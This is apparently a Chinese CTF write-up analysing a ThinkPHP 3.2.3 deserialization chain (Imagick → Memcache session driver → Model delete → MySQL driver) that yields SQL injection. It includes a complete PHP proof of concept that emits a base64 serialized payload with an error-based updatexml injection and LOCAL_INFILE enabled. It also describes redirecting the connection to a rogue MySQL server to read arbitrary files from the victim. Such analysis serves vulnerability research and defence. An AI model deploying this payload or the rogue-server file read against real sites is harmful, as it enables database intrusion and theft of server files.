ThinkPHP3.2.3 反序列化&sql注入漏洞分析

环境

php5.6.9 thinkphp3.2.3

漏洞分析

首先全局搜索 __destruct,这里的 $this->img 可控,可以利用其来调用 其他类的destroy() 方法,或者可以用的__call() 方法,__call() 方法并没有可以利用的

那就去找 destroy() 方法

注意这里,destroy() 是有参数的,而我们调用的时候没有传参,这在php5中是可以的,只发出警告,但还是会执行。但是在php7 里面就会报出错误,不会执行。所以漏洞需要用php5的环境。

继续寻找可利用的delete()方法。

Think\Model类即其继承类里,可以找到这个方法,还有数据库驱动类中也有这个方法的,thinkphp3的数据库模型类的最终是会调用到数据库驱动类中的。

先看Model类中

还需要注意这里!!如果没有 $options['where'] 会直接return掉。

跟进 getPK() 方法

$pk 可控 $this->data 可控 。

最终去驱动类的入口在这里

下面是驱动类的delete方法

我们在一开始调用Model类的delete方法的时候,传入的参数是

$this->sessionName.$sessID

而后面我们执行的时候是依靠数组的,数组是不可以用 字符串连接符的。参数控制不可以利用$this->sessionName

但是可以令其为空(本来就是空),会进入Model 类中的delete方法中的第一个if分支,然后再次调用delete方法,把 $this->data[$pk] 作为参数传入,这是我们可以控制的!

看代码也不难发现注入点是在 $table 这里,也就是 $options['table'],也就是 $this->data[$this->pk['table']];

直接跟进 driver类中的execute() 方法

跟进 initConnect() 方法

跟进connect() 方法

数据库的连接时通过 PDO 来实现的,可以堆叠注入(PDO::MYSQL_ATTR_MULTI_STATEMENTS => true ) 需要指定这个配置。

这里控制 $this->config 来连接数据库。

driver类时抽象类,我们需要用mysql类来实例化。

到这里一条反序列化触发sql注入的链子就做好了。

POC

<?php
namespace Think\Image\Driver;
use Think\Session\Driver\Memcache;
class Imagick{
    private $img;
    public function __construct(){
        $this->img = new Memcache();
    }
}

namespace Think\Session\Driver;
use Think\Model;
class Memcache {
    protected $handle;
    public function __construct(){
        $this->sessionName=null;
        $this->handle= new Model();
    }
}

namespace Think;
use Think\Db\Driver\Mysql;
class Model{
    protected $pk;
    protected $options;
    protected $data;
    protected $db;
    public function __construct(){
        $this->options['where']='';
        $this->pk='jiang';
        $this->data[$this->pk]=array(
            "table"=>"mysql.user where 1=updatexml(1,concat(0x7e,user()),1)#",
            "where"=>"1=1"
        );
        $this->db=new Mysql();
    }
}
namespace Think\Db\Driver;
use PDO;
class Mysql{
    protected $options ;  
    protected $config ;
    public function __construct(){
        $this->options= array(PDO::MYSQL_ATTR_LOCAL_INFILE => true );   // 开启才能读取文件
        $this->config= array(
            "debug"    => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "root"
        );
        }
}

use Think\Image\Driver\Imagick;
echo base64_encode(serialize(new Imagick()));

table 需要是一张存在的表,比如mysql.user,或者information_schemata 里面的表,否则会报表不存在的错误。

这里可以连接任意服务器,所以还有一种利用方式,就是MySQL恶意服务端读取客户端文件漏洞。

利用方式就是我们需要开启一个恶意的mysql服务,然后让客户端去访问的时候,我们的恶意mysql服务就会读出客户端的可读文件。这里的hostname 是开启的恶意mysql服务的地址以及3307端口

下面搭建恶意mysql服务,用的是原作者的https://github.com/Gifts/Rogue-MySql-Server

还有一个go版本的,看起来比较全面。https://github.com/rmb122/rogue_mysql_server

修改portfilelist

执行python脚本后,发包,触发反序列化后,就会去连接恶意服务器,然后把客户端下的文件带出来。

下面就是mysql.log 中的 文件信息(flag.txt)

当脚本处于运行中的时候,我们只可以读取第一次脚本运行时定义的文件,因为mysql服务已经打开了,我们需要关闭mysql服务,然后才可以修改脚本中的其他文件。

ps -ef|grep mysql

然后依次 kill 就好。

写在后面

如果觉得sql注入攻击局限了,还可以配合MySQL恶意服务器实现任意文件读取。

先前并没有看过tp3 的洞,这次比赛(红明谷)的时候,拿到源码就开始审,直觉告诉我一定有可以利用的 __call 方法,于是头铁去找,没找到也没想去找其他类中的同名方法。如果一个地方的思路有两条,一条不通的时候,一定要去看看另一条,即使你不知道他是否也不通。

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖